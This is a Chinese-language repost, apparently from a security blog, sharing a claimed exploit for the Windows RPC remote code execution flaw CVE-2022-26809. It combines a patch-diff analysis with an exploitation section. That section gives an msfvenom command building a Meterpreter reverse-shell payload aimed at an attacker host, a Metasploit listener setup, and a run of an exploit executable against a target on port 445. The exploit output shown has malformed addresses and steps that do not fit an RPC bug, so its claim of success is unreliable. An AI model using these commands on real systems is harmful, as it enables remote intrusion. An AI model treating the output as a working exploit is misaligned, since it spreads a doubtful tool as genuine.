【分享 | 附EXP】CVE-2022-26809 RCE 漏洞

2022年5月20日11:39:43评论613 views字数 927阅读3分5秒阅读模式

来源GitHub：项目作者：rkxxz

CVE 描述

CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因，因为攻击不需要身份验证并且可以通过网络远程执行，并且可能导致远程代码执行 ( RCE) 具有 RPC 服务的权限，这取决于托管 RPC 运行时的进程。运气好的话，这个严重的错误允许访问运行 SMB 的未打补丁的 Windows 主机。该漏洞既可以从网络外部被利用以破坏它，也可以在网络中的机器之间被利用。

供应商信息

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809
https://www.pwndefend.com/2022/04/14/cve-2022-26809/

谁是脆弱的？

测试易受攻击的主机：

Windows 10 专业版 10.0.10240 x64
Windows 10 专业版 10.0.19042 x64
Windows 10 专业版 10.0.19044 x64
Windows 服务器 2019 x64
Windows 服务器 2022 x64
视窗 7 SP3 x64

我们稍后会更新该列表。我们怀疑几乎所有运行 SMB 并开放 445 端口的构建都会受到影响。

RPC 端口

TCP 135,139,445

定位漏洞

CVE 表示，漏洞位于 Windows RPC 运行时中，该运行时在名为 rpcrt4.dll 的库中实现。该运行时库被加载到使用 RPC 协议进行通信的客户端和服务器进程中。我们比较了版本 10.0.22000.434（3 月）和 10.0.22000.613（已修补）并挑选出更改列表。

OSF_SCALL::ProcessResponse 和 OSF_CCALL::ProcessReceivedPDU 函数本质上是相似的；两者都处理 RPC 数据包，但一个在服务器端运行，另一个在客户端运行（SCALL 和 CCALL）。通过区分 OSF_SCALL::ProcessReceivedPDU，我们注意到新版本中添加了两个代码块。

【分享 | 附EXP】CVE-2022-26809 RCE 漏洞

查看修补后的代码，我们看到在 QUEUE::PutOnQueue 之后调用了一个新函数。检查新函数并深入研究它的代码，我们发现它检查整数溢出。换句话说，patch 中的新函数被添加来验证整数变量是否保持在预期值范围内。

【分享 | 附EXP】CVE-2022-26809 RCE 漏洞

深入研究 OSF_SCALL:GetCoalescedBuffer 中的易受攻击代码，我们注意到整数溢出错误可能导致堆缓冲区溢出，其中数据被复制到太小而无法填充的缓冲区。这反过来又允许在堆上将数据写入缓冲区边界之外。当被利用时，这个原语会导致我们远程执行代码！

在其他函数中也添加了相同的用于检查整数溢出的调用：

OSF_CCALL::ProcessResponse OSF_SCALL::GetCoalescedBuffer OSF_CCALL::GetCoalescedBuffer

整数溢出漏洞和防止它的功能存在于客户端和服务器端执行流程中。

开发

第1步

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.105 LPORT=4444 -f raw > shellcode.bin

第2步

msf5 > use multi/handlermsf5 exploit(multi/handler) > set LHOST 192.168.10.105LHOST => 192.168.10.105msf5 exploit(multi/handler) > set LPORT 4444LPORT => 4444msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > run

开发

CVE-2022-26809 ip 端口

C:>CVE-2022-26809.exe 192.168.10.110 445CVE-2022-26809 RPC Remote Exploit[+] Checking... 192.168.10.110 445[+] 192.168.10.110 445 IsOpen[+] found low stub at phys addr 6800![+] Pipe at 4ac660[+] base of RPC heap at fffff79480048033[+] ntoskrnl entry at fffff802435782060[+] found Pipe self-ref entry 1eb[+] found Alsr at fffff64480301671[+] found RPC CALL at fffff802451b3b30[+] load shellcode.bin[+] built shellcode![+] KUSER_SHARED_DATA PTE at fffff4ffc0033060[+] KUSER_SHARED_DATA PTE NX bit cleared![+] Wrote shellcode at fffff75006070a023![+] Try to execute shellcode![ ] Exploit Suceess!